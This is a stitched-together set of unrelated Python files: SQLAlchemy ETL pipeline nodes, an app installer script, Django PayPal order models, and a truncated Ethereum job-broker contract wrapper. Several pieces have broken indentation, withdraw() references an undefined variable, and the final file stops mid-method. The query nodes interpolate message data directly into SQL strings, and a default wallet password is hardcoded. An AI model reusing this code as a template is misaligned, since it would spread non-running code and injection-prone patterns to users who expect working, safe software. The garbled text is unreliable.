                    logger.warning("Column %s foreign key %s table (%s) has not been defined in backend (ignoring).", column, column.fk_sqlcolumn, column.fk_sqlcolumn.sqltable)
                    continue
                self.sa_table.append_column(Column(column.name,
                                                   self._get_sa_type(column),
                                                   ForeignKey(column.fk_sqlcolumn.sqltable.sa_table.columns[column.fk_sqlcolumn.name]),
                                                   primary_key=column.pk,
                                                   nullable=column.nullable,
                                                   autoincrement=(True if column.type == "AutoIncrement" else False)))
            else:
                self.sa_table.append_column(Column(column.name,
                                                   self._get_sa_type(column),
                                                   primary_key=column.pk,
                                                   nullable=column.nullable,
                                                   autoincrement=(True if column.type == "AutoIncrement" else False)))
        # Check schema:
        # Create if doesn't exist
        if (not self.connection.engine().has_table(self.name)):
            logger.info("Creating table %s" % self.name)
            self.sa_table.create(self.connection.connection())
        # TODO:? Extend? (unsafe, allow read-only connections and make them default?)
        # TODO:? Delete columns (unsafe, allow read-only connections and make them default?)

    def pk(self, ctx):
        """
        Returns the primary key column definition, or None if none defined.

        Raises if more than one column is flagged as primary key.
        """
        #if (self._pk == False):
        # NOTE: caching is currently disabled; the pk is recomputed per call.
        if True:
            pk_cols = []
            for col in self.columns:
                if col.pk:
                    pk_cols.append(col)
            if (len(pk_cols) > 1):
                raise Exception("Table %s has multiple primary keys: %s" % (self.name, pk_cols))
            elif (len(pk_cols) == 1):
                self._pk = pk_cols[0]
            else:
                self._pk = None
        return self._pk

    def _attribsToClause(self, attribs):
        """Build a SQLAlchemy AND clause matching the given attribute dict.

        List/tuple values become IN clauses; scalars become equality tests.
        """
        clauses = []
        for k, v in attribs.items():
            if isinstance(v, (list, tuple)):
                clauses.append(self.sa_table.c[k].in_(v))
            else:
                clauses.append(self.sa_table.c[k] == v)
        return and_(*clauses)

    def _rowtodict(self, row):
        """Convert a SQLAlchemy result row into a plain dict keyed by column name."""
        d = {}
        for column in self.columns:
            #print column
            d[column.name] = getattr(row, column.name)
        return d

    def _find(self, ctx, attribs):
        """Yield all rows matching the given attribute dict, as plain dicts."""
        self._selects = self._selects + 1
        SQLTable._selects = SQLTable._selects + 1
        query = self.sa_table.select(self._attribsToClause(attribs))
        rows = self.connection.connection().execute(query)
        for r in rows:
            # Ensure we return dicts, not RowProxys from SqlAlchemy
            yield self._rowtodict(r)

    def lookup(self, ctx, attribs, find_function=None):
        """Return the single row matching attribs, or None if not found.

        Raises if attribs is empty or if more than one row matches.
        """
        logger.debug ("Lookup on '%s' attribs: %s" % (self, attribs))
        if (len(attribs.keys()) == 0):
            raise Exception("Cannot lookup on table '%s' with no criteria (empty attribute set)" % self.name)
        find_function = find_function or self._find
        rows = find_function(ctx, attribs)
        rows = list(rows)
        if (len(rows) > 1):
            raise Exception("Found more than one row when searching for just one in table %s: %s" % (self.name, attribs))
        elif (len(rows) == 1):
            row = rows[0]
        else:
            row = None
        logger.debug("Lookup result on %s: %s = %s" % (self.name, attribs, row))
        return row

    def upsert(self, ctx, data, keys = []):
        """
        Upsert checks if the row exists and has changed. It does a lookup
        followed by an update or insert as appropriate.
        """
        # TODO: Check for AutoIncrement in keys, shall not be used
        # If keys
        qfilter = {}
        if (len(keys) > 0):
            for key in keys:
                try:
                    qfilter[key] = data[key]
                except KeyError as e:
                    raise Exception("Could not find attribute '%s' in data when storing row data: %s" % (key, data))
        else:
            # No explicit keys: fall back to the primary key column.
            pk = self.pk(ctx)
            qfilter[pk.name] = data[pk.name]
        # Do lookup
        if len(qfilter) > 0:
            row = self.lookup(ctx, qfilter)
            if (row):
                # Check row is identical
                for c in self.columns:
                    if c.type != "AutoIncrement":
                        v1 = row[c.name]
                        v2 = data[c.name]
                        # Dates are compared via their ISO string form.
                        if c.type == "Date":
                            v1 = row[c.name].strftime('%Y-%m-%d')
                            v2 = data[c.name].strftime('%Y-%m-%d')
                        # Coerce both sides to str if either is a string.
                        if (isinstance(v1, str) or isinstance(v2, str)):
                            if (not isinstance(v1, str)): v1 = str(v1)
                            if (not isinstance(v2, str)): v2 = str(v2)
                        if (v1 != v2):
                            if (c.name not in self._lookup_changed_fields):
                                logger.warning("%s updating an entity that exists with different attributes, overwriting (field=%s, existing_value=%s, tried_value=%s)" % (self, c.name, v1, v2))
                                #self._lookup_changed_fields.append(c["name"])
                # Update the row
                row = self.update(ctx, data, keys)
                return row
        # No existing row found: insert a new one.
        row_with_id = self.insert(ctx, data)
        return row_with_id

    def _prepare_row(self, ctx, data):
        """Extract the declared (non-autoincrement) column values from data.

        Raises if a declared column is missing from the incoming data.
        """
        row = {}
        for column in self.columns:
            if column.type != "AutoIncrement":
                try:
                    row[column.name] = data[column.name]
                except KeyError as e:
                    raise Exception("Missing attribute for column %s in table '%s' while inserting row: %s" % (e, self.name, data))
                # Checks
                if (column.type == "String") and (not isinstance(row[column.name], str)):
                    self._unicode_errors = self._unicode_errors + 1
                    if (ctx.debug):
                        logger.warning("Unicode column %r received non-unicode string: %r " % (column.name, row[column.name]))
        return row

    def insert(self, ctx, data):
        """Insert a row built from data; returns the row including the
        generated primary key (when one exists)."""
        row = self._prepare_row(ctx, data)
        logger.debug("Inserting in table '%s' row: %s" % (self.name, row))
        res = self.connection.connection().execute(self.sa_table.insert(row))
        pk = self.pk(ctx)
        if pk:
            row[pk.name] = res.inserted_primary_key[0]
        self._inserts = self._inserts + 1
        SQLTable._inserts = SQLTable._inserts + 1
        if pk is not None:
            return row
        else:
            return row  # None

    def update(self, ctx, data, keys = []):
        """Update the row identified by keys (or by the primary key) with data."""
        row = self._prepare_row(ctx, data)
        # Automatically calculate lookup if necessary
        qfilter = {}
        if (len(keys) > 0):
            for key in keys:
                try:
                    qfilter[key] = data[key]
                except KeyError as e:
                    raise Exception("Could not find attribute '%s' in data when storing row data: %s" % (key, data))
        else:
            pk = self.pk(ctx)
            qfilter[pk.name] = data[pk.name]
        logger.debug("Updating in table '%s' row: %s" % (self.name, row))
        res = self.connection.connection().execute(self.sa_table.update(self._attribsToClause(qfilter), row))
        self._updates = self._updates +1
        SQLTable._updates = SQLTable._updates + 1
        # NOTE(review): when keys are given, `pk` is only bound if the else
        # branch ran on a previous path — here it is the name from the last
        # assignment above; confirm callers always reach a bound `pk`.
        if pk is not None:
            return row
        else:
            return None
class Transaction(Node):
    """Node that wraps downstream processing of each message in a database
    transaction: begin before yielding, commit when control returns."""

    def __init__(self, connection, enabled=True):
        super().__init__()
        self.connection = connection    # Connection component to transact on
        self.enabled = enabled          # may be a string; parsed in initialize()
        self._transaction = None        # currently open transaction, if any

    def initialize(self, ctx):
        super(Transaction, self).initialize(ctx)
        ctx.comp.initialize(self.connection)
        # Accept "true"/"false"-style strings from configuration.
        self.enabled = parsebool(self.enabled)

    def finalize(self, ctx):
        ctx.comp.finalize(self.connection)
        #super(Transaction, self).finalize(ctx)

    def process(self, ctx, m):
        # Store
        # Nested transactions are not supported.
        if (self._transaction != None):
            raise Exception("Trying to start transaction while one already exists is not supported")
        if (self.enabled):
            logger.info("Starting database transaction")
            self._transaction = self.connection.connection().begin()
        else:
            logger.debug("Not starting database transaction (Transaction node is disabled)")
        yield m
        # Control returns here after downstream processing of m completes.
        if (self.enabled):
            logger.info("Commiting database transaction")
            self._transaction.commit()
            self._transaction = None
class StoreRow(Node):
    """Node that stores each incoming message as a row of a SQLTable,
    either inserting unconditionally or upserting."""

    def __init__(self, sqltable, store_mode=SQLTable.STORE_MODE_INSERT):
        super().__init__()
        self.sqltable = sqltable
        self.store_mode = store_mode

    def initialize(self, ctx):
        super().initialize(ctx)
        ctx.comp.initialize(self.sqltable)

    def finalize(self, ctx):
        ctx.comp.finalize(self.sqltable)
        super().finalize(ctx)

    def process(self, ctx, m):
        # Persist the message with the configured store mode, then pass it on.
        if self.store_mode == SQLTable.STORE_MODE_INSERT:
            self.sqltable.insert(ctx, m)
        elif self.store_mode == SQLTable.STORE_MODE_UPSERT:
            self.sqltable.upsert(ctx, m)
        yield m
class QueryLookup(Node):
    """Node that runs an interpolated SQL query expected to return exactly
    one row, and merges that row's columns into the message."""

    connection = None
    query = None

    def initialize(self, ctx):
        super().initialize(ctx)
        ctx.comp.initialize(self.connection)

    def finalize(self, ctx):
        ctx.comp.finalize(self.connection)
        super().finalize(ctx)

    def _rowtodict(self, row):
        # Convert a SQLAlchemy row into a plain dict.
        return {name: value for name, value in row.items()}

    def _do_query(self, query):
        """Execute the query and return its single row as a dict.

        Raises when the query yields zero rows or more than one row.
        """
        logger.debug("Running query: %s" % query.strip())
        cursor = self.connection.connection().execute(query)
        found = None
        for record in cursor:
            if found is not None:
                raise Exception("Error: %s query resulted in more than one row: %s" % (self, self.query))
            found = self._rowtodict(record)
        # TODO: Optional fail?
        if not found:
            raise Exception("Error: %s query returned no results: %s" % (self, self.query))
        return found

    def process(self, ctx, m):
        sql = ctx.interpolate(self.query, m)
        row = self._do_query(sql)
        if row is not None:
            m.update(row)
        yield m
class Query(Node):
    """
    Executes a SQL query on the given connection and returns the results.
    By default, each row is returned as a new message, generated by copying
    the input message and updating its fields with the columns that resulted
    from the SQL query.
    :param connection: The SQLConnection object to use.
    :param query: The SQL query string to execute.
    :param embed: If defined, the entire results of the query are returned
                  as an array contained in the message attribute named like
                  the value of the `embed` parameter (m[embed]=query_result_array).
    :param single: If True, the process will fail if the query returns more than one row.
    :param failifempty: if True, the process will fail if the query returns no row.
    """

    def __init__(self, connection, query, embed=False, single=False, failifempty=True):
        super().__init__()
        self.connection = connection
        self.query = query
        self.embed = embed
        self.single = single
        self.failifempty = failifempty

    def initialize(self, ctx):
        super(Query, self).initialize(ctx)
        ctx.comp.initialize(self.connection)

    def finalize(self, ctx):
        ctx.comp.finalize(self.connection)
        super(Query, self).finalize(ctx)

    def _rowtodict(self, row):
        # Convert a SQLAlchemy row into a plain dict.
        d = {}
        for column, value in row.items():
            d[column] = value
        return d

    def process(self, ctx, m):
        # Interpolate message attributes into the query text before running it.
        query = ctx.interpolate(self.query, m)
        logger.debug("Running query: %s" % query.strip())
        rows = self.connection.connection().execute(query)
        try:
            if self.embed:
                # Embed mode: collect all rows into one attribute of m.
                result = []
                for r in rows:
                    result.append(self._rowtodict(r))
                if self.single and len(result) > 1:
                    raise Exception("Error: %s query resulted in more than one row: %s" % (self, query))
                if len(result) == 0:
                    if self.failifempty:
                        raise Exception("Error: %s query returned no results: %s" % (self, query))
                    else:
                        result = None
                # With single=True the lone row is embedded directly (not a list).
                m[self.embed] = result[0] if self.single else result
                yield m
            else:
                # Fan-out mode: one copied message per result row.
                result = None
                for r in rows:
                    if self.single and result != None:
                        raise Exception("Error: %s query resulted in more than one row: %s" % (self, query))
                    m2 = ctx.copy_message(m)
                    result = self._rowtodict(r)
                    if result is not None:
                        m2.update(result)
                    yield m2
                if not result:
                    if self.failifempty:
                        raise Exception("Error: %s query returned no results: %s" % (self, query))
                    else:
                        yield m
        except ResourceClosedError as e:
            # Statement returned no result set (e.g. DDL/DML): pass message through.
            yield m
|
"""
An script to configure install all the runtime dependencies required of the
Let's Sched It application-space.
@author: Elias Gabriel
@revision: v1.0
"""
import subprocess
def cmd(command, capture=False):
    """Run *command* through the system shell.

    Args:
        command: the shell command line to execute.
        capture: when True, capture stdout/stderr on the returned object.

    Returns:
        The subprocess.CompletedProcess describing the finished command.
    """
    completed = subprocess.run(command, shell=True, check=False, capture_output=capture)
    return completed
def header(message):
    """Print a purple ANSI banner announcing an installation step."""
    banner = "".join(["\n\33[95m ===== ", message, "...\33[0m"])
    print(banner)
if __name__ == "__main__":
# Confirm that Node.js is installed
if cmd("node -v && npm -v", True).returncode != 0:
print("\n\33[91m *** \33[4mInstallation error!\33[0m\33[91m ***")
print("Node.js and npm are required by the frontend architecture.\nPlease install Node.js and npm using your package manager\n or manually by source, then retry installation.\n")
exit(1)
# Confirm that MySQL (MariaDB) is installed
if cmd("mysql --print-defaults", True).returncode != 0:
print("\n\33[91m *** \33[4mInstallation error!\33[0m\33[91m ***")
print("MySQL is required by the backend architecture.\nPlease install MySQL, preferably MariaDB, using \n your package manager, then retry installation.\nDetailed instructions can be found on the official README.\n")
exit(1)
# Download Node dependencies
header("Installing node dependencies")
cmd("cd ./source/web && npm install")
# Download Python dependencies
header("Installing pre-built Python dependencies")
cmd("pip install -r ./source/api/requirements.txt")
# Configure MySQL database
header("Configuring the MySQL database")
cmd("cd ./source/api && python .pyinitdb")
print("\n*** \33[92mDependency installation complete!\33[0m ***")
|
from django.db import models
from .base import PaypalModel
from ..constants import (
ORDER_INTENT_CHOICES, ORDER_STATUS_CHOICES,
CAPTURE_STATUS_CHOICES, DISBURSEMENT_MODE_CHOICES,
)
from ..fields import JSONField, CurrencyAmountField
class CheckoutOrder(PaypalModel):
    '''
    https://developer.paypal.com/docs/api/orders/v2/#orders
    This model is called simply "Order" in PayPal docs, but Paypal calls this resource
    'checkout-order'
    '''
    # Raw PayPal payload fragments stored as JSON documents.
    payment_source = JSONField(default=dict)
    intent = models.CharField(choices=ORDER_INTENT_CHOICES, max_length=24)
    payer = JSONField(default=dict)
    purchase_units = JSONField(default=list)
    status = models.CharField(choices=ORDER_STATUS_CHOICES, max_length=24)
    # Local Payer row linked from the payer payload; populated in save().
    payer_model = models.ForeignKey(
        'Payer', on_delete=models.SET_NULL, null=True, blank=True,
    )

    def save(self, **kwargs):
        """Save the order, upserting a related Payer from the payer payload.

        Reads self.payer['payer_info'] and, when it contains a payer_id,
        creates/updates the matching Payer row and links it via payer_model
        before delegating to the parent save().
        """
        # Imported here to avoid a circular import between model modules.
        from .payer import Payer
        # On save, get the payer_info object and do a best effort attempt at
        # saving a Payer model and relation into the db.
        payer_info = self.payer.get('payer_info', {})
        if payer_info and 'payer_id' in payer_info:
            # Copy the payer_info dict before mutating it
            payer_info = payer_info.copy()
            payer_id = payer_info.pop('payer_id')
            # user/livemode are assumed to be fields provided by PaypalModel
            # — TODO confirm against the base model definition.
            payer_info['user'] = self.user
            payer_info['livemode'] = self.livemode
            self.payer_model, created = Payer.objects.update_or_create(
                id=payer_id, defaults=payer_info
            )
        return super().save(**kwargs)
class Capture(PaypalModel):
    '''
    https://developer.paypal.com/docs/api/orders/v2/#definition-capture
    This resource is sent to webhook when you try to capture CheckoutOrder
    '''
    status = models.CharField(choices=CAPTURE_STATUS_CHOICES, max_length=24)
    # Additional detail about the capture status, as sent by PayPal.
    status_details = JSONField(default=dict)
    amount = CurrencyAmountField()
    # Merchant-supplied identifiers (may be empty).
    invoice_id = models.CharField(max_length=255, blank=True)
    custom_id = models.CharField(max_length=127, blank=True)
    seller_protection = JSONField()
    # Whether this capture is the final one for its authorization.
    final_capture = models.BooleanField()
    seller_receivable_breakdown = JSONField()
    disbursement_mode = models.CharField(choices=DISBURSEMENT_MODE_CHOICES,
                                         max_length=24, blank=True)
    supplementary_data = JSONField(default=dict)
|
#!/usr/bin/env python3
import sys
import time
from contextlib import suppress
from os.path import expanduser
from pathlib import Path
from typing import Union
from pymongo import MongoClient
from web3.exceptions import TransactionNotFound
from web3.types import TxReceipt
from broker import cfg
from broker._utils._log import ok
from broker._utils.tools import exit_after, log, print_tb, without_keys
from broker._utils.yaml import Yaml
from broker.config import env
from broker.errors import Web3NotConnected
from broker.libs.mongodb import MongoBroker
from broker.utils import ipfs_to_bytes32, terminate
from brownie.network.account import Account, LocalAccount
from brownie.network.transaction import TransactionReceipt
# from brownie.network.gas.strategies import LinearScalingStrategy
# Gas price (in gwei) used as the starting value for all transactions.
GAS_PRICE = 1.0
# Seconds after which a pending transaction attempt is abandoned (see @exit_after).
EXIT_AFTER = 120
class Contract:
"""Object to access smart-contract functions."""
    def __init__(self, is_brownie=False) -> None:
        """Create a new Contract.

        Sets up the Mongo-backed cache, default transaction options and the
        web3 connection (via brownie, or broker.imports when is_brownie is
        False).
        """
        mc = MongoClient()
        self.mongo_broker = MongoBroker(mc, mc["ebloc_broker"]["cache"])
        # self.gas_limit = "max"  # 300000
        self.ops = {}             # per-transaction options (gas, from, value, ...)
        self.max_retries = 10     # retry budget used by timeout_wrapper()
        self.required_confs = 1   # confirmations to wait for by default
        self._from = ""
        #: Transaction cost exceeds current gas limit. Limit: 9990226, got:
        # 10000000. Try decreasing supplied gas.
        self.gas = 9980000
        self.gas_price = GAS_PRICE
        # self.gas_strategy = LinearScalingStrategy(f"{GAS_PRICE} gwei", "10 gwei", 1.1, time_duration=15)
        # self.gas_params = {"gas_price": self.gas_strategy, "gas": self.gas}
        self._setup(is_brownie)
        # Receipt keys stripped when a compact receipt is requested.
        self.invalid = {"logs", "logsBloom"}
        # Best effort: tolerate a missing/unsynced chain at construction time.
        with suppress(Exception):
            self.deployed_block_number = self.get_deployed_block_number()
    def _setup(self, is_brownie=False):
        """Bind self.w3 (and, for non-brownie runs, the contract handles).

        Exits the process when the non-brownie connection cannot be made.
        """
        if is_brownie:
            from brownie import web3

            self.w3 = web3
        else:
            try:
                from broker.imports import connect

                self.eBlocBroker, self.w3, self._eBlocBroker = connect()
            except Exception as e:
                print_tb(e)
                sys.exit(1)
ebb = None # contract object
# Imported methods
# ================
from broker.eblocbroker_scripts.authenticate_orc_id import authenticate_orc_id
from broker.eblocbroker_scripts.get_provider_info import get_provider_info
from broker.eblocbroker_scripts.process_payment import process_payment
from broker.eblocbroker_scripts.submit_job import submit_job
from broker.eblocbroker_scripts.submit_job import check_before_submit
from broker.eblocbroker_scripts.submit_job import is_provider_valid
from broker.eblocbroker_scripts.submit_job import is_requester_valid
from broker.eblocbroker_scripts.get_job_info import get_job_owner
from broker.eblocbroker_scripts.get_job_info import get_job_info
from broker.eblocbroker_scripts.get_job_info import get_job_info_print
from broker.eblocbroker_scripts.get_job_info import set_job_received_block_number
from broker.eblocbroker_scripts.get_job_info import update_job_cores
from broker.eblocbroker_scripts.get_job_info import analyze_data
from broker.eblocbroker_scripts.get_job_info import get_job_source_code_hashes
from broker.eblocbroker_scripts.get_requester_info import get_requester_info
from broker.eblocbroker_scripts.log_job import run_log_cancel_refund
from broker.eblocbroker_scripts.log_job import run_log_job
from broker.eblocbroker_scripts.register_provider import _register_provider
from broker.eblocbroker_scripts.refund import refund
from broker.eblocbroker_scripts.register_requester import register_requester
from broker.eblocbroker_scripts.update_provider_info import update_provider_info
from broker.eblocbroker_scripts.update_provider_prices import update_provider_prices
from broker.eblocbroker_scripts.transfer_ownership import transfer_ownership
from broker.eblocbroker_scripts.data import get_data_info
def brownie_load_account(self, fname="", password="alper"):
"""Load accounts from Brownie for Bloxberg."""
from brownie import accounts
cfg = Yaml(env.LOG_PATH / ".bloxberg_account.yaml")
if not fname:
fname = cfg["config"]["name"]
if cfg["config"]["passw"]:
password = cfg["config"]["passw"]
full_path = expanduser(f"~/.brownie/accounts/{fname}")
if not full_path:
raise Exception(f"{full_path} does not exist")
# accounts.load("alper.json", password="alper") # DELETE
return accounts.load(fname, password=password)
    def is_eth_account_locked(self, addr):
        """Check whether the ethereum account is locked.

        On Bloxberg the check is implicit: loading the Brownie account fails
        when it is unusable. On geth-based nodes the wallet list is scanned
        for the given address. Terminates the process when locked.
        """
        if env.IS_BLOXBERG:
            try:
                account = self.brownie_load_account()
            except Exception as e:
                error_msg = f"E: PROVIDER_ID({env.PROVIDER_ID}) is locked, unlock it for futher use. \n{e}"
                terminate(error_msg, is_traceback=True)
        else:
            for account in self.w3.geth.personal.list_wallets():
                _address = account["accounts"][0]["address"]
                if _address == addr:
                    if account["status"] == "Locked":
                        error_msg = f"E: PROVIDER_ID({_address}) is locked, unlock it for futher use"
                        terminate(error_msg, is_traceback=False)
    def is_synced(self):
        """Check whether the web3 is synced.

        NOTE(review): web3's `eth.syncing` is falsy when the node is fully
        synced and a status mapping while syncing — so this actually returns
        the *syncing* status; confirm callers expect that polarity.
        """
        return self.w3.eth.syncing
def timenow(self) -> int:
return self.w3.eth.get_block(self.w3.eth.get_block_number())["timestamp"]
    def _wait_for_transaction_receipt(self, tx_hash: str, compact=False, is_silent=False) -> TxReceipt:
        """Wait till the tx is deployed.

        Polls for the receipt every `poll_latency` seconds until the tx is
        included in a block. With compact=True the bulky receipt keys listed
        in self.invalid are stripped from the returned mapping.
        """
        tx_receipt = None
        attempt = 0
        poll_latency = 3  # seconds between polls
        if not is_silent:
            log(f"## Waiting for the transaction({tx_hash}) receipt... ", end="")

        while True:
            try:
                tx_receipt = cfg.w3.eth.get_transaction_receipt(tx_hash)
            except TransactionNotFound as e:
                # Not yet in the mempool/indexed; keep polling.
                log()
                log(f"warning: {e}")
            except Exception as e:
                print_tb(str(e))
                tx_receipt = None

            # A receipt with a blockHash means the tx is mined.
            if tx_receipt and tx_receipt["blockHash"]:
                break

            if not is_silent:
                log()
                log(f"## attempt={attempt} | sleeping_for={poll_latency} seconds ", end="")

            attempt += 1
            time.sleep(poll_latency)

        if not is_silent:
            log(ok())

        if not compact:
            return tx_receipt
        else:
            return without_keys(tx_receipt, self.invalid)
    def tx_id(self, tx):
        """Return transaction id.

        Brownie transactions expose `.txid`; raw web3 hashes are hex-encoded.
        """
        if env.IS_BLOXBERG:
            return tx.txid

        return tx.hex()
def get_deployed_block_number(self) -> int:
"""Return contract's deployed block number."""
try:
contract = self._get_contract_yaml()
except Exception as e:
print_tb(e)
return False
block_number = self.w3.eth.get_transaction(contract["tx_hash"]).blockNumber
if block_number is None:
raise Exception("E: Contract is not available on the blockchain, is it synced?")
return self.w3.eth.get_transaction(contract["tx_hash"]).blockNumber
    def get_transaction_receipt(self, tx, compact=False):
        """Get transaction receipt.

        Returns the transaction receipt specified by transactionHash.
        If the transaction has not yet been mined returns 'None'.
        With compact=True the bulky keys in self.invalid are stripped.

        __ https://web3py.readthedocs.io/en/stable/web3.eth.html#web3.eth.Eth.get_transaction_receipt
        """
        tx_receipt = self.w3.eth.get_transaction_receipt(tx)
        if not compact:
            return tx_receipt
        else:
            return without_keys(tx_receipt, self.invalid)
    def is_web3_connected(self):
        """Return whether web3 connected or not."""
        return self.w3.isConnected()
    def account_id_to_address(self, address: str, account_id=None):
        """Convert account id into address.

        When `address` is given it is simply checksummed; otherwise the
        node's account list is indexed with `account_id`.

        Raises:
            Exception: if neither a valid address nor a valid index is given.
        """
        if address:
            return self.w3.toChecksumAddress(address)

        if isinstance(account_id, int):
            try:
                account = self.w3.eth.accounts[account_id]
                return self.w3.toChecksumAddress(account)
            except Exception as e:
                raise Exception("E: Given index account does not exist, check .eblocpoa/keystore") from e
        else:
            raise Exception(f"E: Invalid account {address} is provided")
def _get_balance(self, account, _type="ether"):
if not isinstance(account, (Account, LocalAccount)):
account = self.w3.toChecksumAddress(account)
else:
account = str(account)
balance_wei = self.w3.eth.get_balance(account)
return self.w3.fromWei(balance_wei, _type)
    def transfer(self, amount, from_account, to_account, required_confs=1):
        """Transfer `amount` from one brownie account to another; return the tx id."""
        tx = from_account.transfer(to_account, amount, gas_price=GAS_PRICE, required_confs=required_confs)
        return self.tx_id(tx)
    def get_block_number(self):
        """Return the current block number."""
        return self.w3.eth.block_number
    def is_address(self, addr):
        """Return True if `addr` is a valid Ethereum address.

        Raises:
            Web3NotConnected: if the underlying web3 call fails.
        """
        try:
            return self.w3.isAddress(addr)
        except Exception as e:
            print_tb(e)
            raise Web3NotConnected from e
def _get_contract_yaml(self) -> Path:
try:
_yaml = Yaml(env.CONTRACT_YAML_FILE)
if env.IS_BLOXBERG:
return _yaml["networks"]["bloxberg"]
elif env.IS_EBLOCPOA:
return _yaml["networks"]["eblocpoa"]
except Exception as e:
raise e
def is_contract_exists(self) -> bool:
try:
contract = self._get_contract_yaml()
except Exception as e:
raise e
contract_address = self.w3.toChecksumAddress(contract["address"])
if self.w3.eth.get_code(contract_address) == "0x" or self.w3.eth.get_code(contract_address) == b"":
raise
log(f"==> contract_address={contract_address.lower()}")
return True
    def print_contract_info(self):
        """Print contract information (address and deployment block)."""
        print(f"address={self.eBlocBroker.contract_address}")
        print(f"deployed_block_number={self.get_deployed_block_number()}")
    ##############
    # Timeout Tx #
    ##############
    @exit_after(EXIT_AFTER)
    def timeout(self, func, *args):
        """Timeout deploy contract's functions.

        Dispatches `func` by name against the contract object, aborting after
        EXIT_AFTER seconds via the @exit_after decorator.

        brownie:
            self.eBlocBroker.submitJob(*args, self.ops)
        geth:
            self.eBlocBroker.functions.submitJob(*args).transact(self.ops)
        """
        method = None
        try:
            if env.IS_BLOXBERG:
                # Brownie path: load the signing account matching ops["from"].
                fn = self.ops["from"].lower().replace("0x", "") + ".json"
                self.brownie_load_account(fn)
                method = getattr(self.eBlocBroker, func)
                return method(*args, self.ops)
            else:
                method = getattr(self.eBlocBroker.functions, func)
                return method(*args).transact(self.ops)
        except AttributeError as e:
            raise Exception(f"Method {method} not implemented") from e
    def timeout_wrapper(self, method, *args):
        """Retry `method` up to max_retries, rebuilding the tx options each
        attempt and escalating gas price after a mempool timeout.

        NOTE(review): returns None when every retry fails — confirm callers
        handle a None transaction result.
        """
        for _ in range(self.max_retries):
            self.ops = {
                "gas": self.gas,
                "gas_price": f"{self.gas_price} gwei",
                "from": self._from,
                "allow_revert": True,
                "required_confs": self.required_confs,
            }
            try:
                return self.timeout(method, *args)
            except ValueError as e:
                log(f"E: {e}")
                if "Execution reverted" in str(e):
                    # Permanent failure: do not retry reverted calls.
                    raise e

                if "Transaction cost exceeds current gas limit" in str(e):
                    # Shrink the gas allotment and retry.
                    self.gas -= 10000
            except KeyboardInterrupt:
                # @exit_after signals a timeout via KeyboardInterrupt.
                log("warning: Timeout Awaiting Transaction in the mempool")
                self.gas_price *= 1.13
    ################
    # Transactions #
    ################
    def _submit_job(self, required_confs, requester, job_price, *args) -> "TransactionReceipt":
        """Send a submitJob transaction paying `job_price` wei from `requester`.

        Retries like timeout_wrapper but with a custom ops dict carrying the
        job payment as the tx value.

        NOTE(review): returns None when every retry fails — confirm callers
        handle that.
        """
        self.gas_price = GAS_PRICE
        for _ in range(self.max_retries):
            self.ops = {
                "gas": self.gas,
                "gas_price": f"{self.gas_price} gwei",
                "from": requester,
                "allow_revert": True,
                "value": self.w3.toWei(job_price, "wei"),
                "required_confs": required_confs,
            }
            try:
                return self.timeout("submitJob", *args)
            except ValueError as e:
                log(f"E: {e}")
                if "Execution reverted" in str(e):
                    raise e

                if "Transaction cost exceeds current gas limit" in str(e):
                    self.gas -= 10000
            except KeyboardInterrupt as e:
                if "Awaiting Transaction in the mempool" in str(e):
                    log("warning: Timeout Awaiting Transaction in the mempool")
                    self.gas_price *= 1.13
def withdraw(self, account) -> "TransactionReceipt":
"""Withdraw payment."""
self.gas_price = GAS_PRICE
self._from = self.w3.toChecksumAddress(account)
self.required_confs = 1
return self.timeout_wrapper("withdraw", *args)
    def _register_requester(self, _from, *args) -> "TransactionReceipt":
        """Send a registerRequester transaction from `_from`."""
        self.gas_price = GAS_PRICE
        self._from = _from
        self.required_confs = 1
        return self.timeout_wrapper("registerRequester", *args)
    def _refund(self, _from, *args) -> "TransactionReceipt":
        """Send a refund transaction from `_from`."""
        self.gas_price = GAS_PRICE
        self._from = _from
        self.required_confs = 1
        return self.timeout_wrapper("refund", *args)
    def _transfer_ownership(self, _from, new_owner) -> "TransactionReceipt":
        """Transfer contract ownership to `new_owner` (sent from `_from`)."""
        self.gas_price = GAS_PRICE
        self._from = _from
        self.required_confs = 1
        return self.timeout_wrapper("transferOwnership", new_owner)
    def _authenticate_orc_id(self, _from, *args) -> "TransactionReceipt":
        """Send an authenticateOrcID transaction from `_from`."""
        self.gas_price = GAS_PRICE
        self._from = _from
        self.required_confs = 1
        return self.timeout_wrapper("authenticateOrcID", *args)
    def _update_provider_prices(self, *args) -> "TransactionReceipt":
        """Send an updateProviderPrices transaction from the provider account."""
        self.gas_price = GAS_PRICE
        self._from = env.PROVIDER_ID
        self.required_confs = 1
        return self.timeout_wrapper("updateProviderPrices", *args)
    def _update_provider_info(self, *args) -> "TransactionReceipt":
        """Send an updateProviderInfo transaction from the provider account."""
        self.gas_price = GAS_PRICE
        self._from = env.PROVIDER_ID
        self.required_confs = 1
        return self.timeout_wrapper("updateProviderInfo", *args)
    def register_provider(self, *args) -> "TransactionReceipt":
        """Register provider."""
        self.gas_price = GAS_PRICE
        self._from = env.PROVIDER_ID
        self.required_confs = 1
        return self.timeout_wrapper("registerProvider", *args)
    def register_data(self, *args) -> "TransactionReceipt":
        """Register the dataset hash."""
        self.gas_price = GAS_PRICE
        self._from = env.PROVIDER_ID
        self.required_confs = 1
        return self.timeout_wrapper("registerData", *args)
    def update_data_price(self, *args) -> "TransactionReceipt":
        """Update the price of a registered dataset."""
        self.gas_price = GAS_PRICE
        self._from = env.PROVIDER_ID
        self.required_confs = 1
        # NOTE(review): "updataDataPrice" looks misspelled — confirm it
        # matches the contract's ABI before changing it.
        return self.timeout_wrapper("updataDataPrice", *args)
    def set_job_status_running(self, key, index, job_id, start_time) -> "TransactionReceipt":
        """Set the job status as running.

        Fire-and-forget: required_confs is 0, so the tx is not waited on.
        """
        _from = self.w3.toChecksumAddress(env.PROVIDER_ID)
        self._from = _from
        self.required_confs = 0
        return self.timeout_wrapper("setJobStatusRunning", key, int(index), int(job_id), int(start_time))
    def _process_payment(self, *args) -> "TransactionReceipt":
        """Send a processPayment transaction (fire-and-forget, 0 confs)."""
        self.gas_price = GAS_PRICE
        self._from = env.PROVIDER_ID
        self.required_confs = 0
        return self.timeout_wrapper("processPayment", *args)
    def remove_registered_data(self, *args) -> "TransactionReceipt":
        """Remove registered data (fire-and-forget, 0 confs)."""
        self.gas_price = GAS_PRICE
        self._from = env.PROVIDER_ID
        self.required_confs = 0
        return self.timeout_wrapper("removeRegisteredData", *args)
    ###########
    # GETTERS #
    ###########
    def get_registered_data_prices(self, *args):
        """Return the price of a registered dataset (read-only call)."""
        if env.IS_BLOXBERG:
            return self.eBlocBroker.getRegisteredDataPrice(*args)
        else:
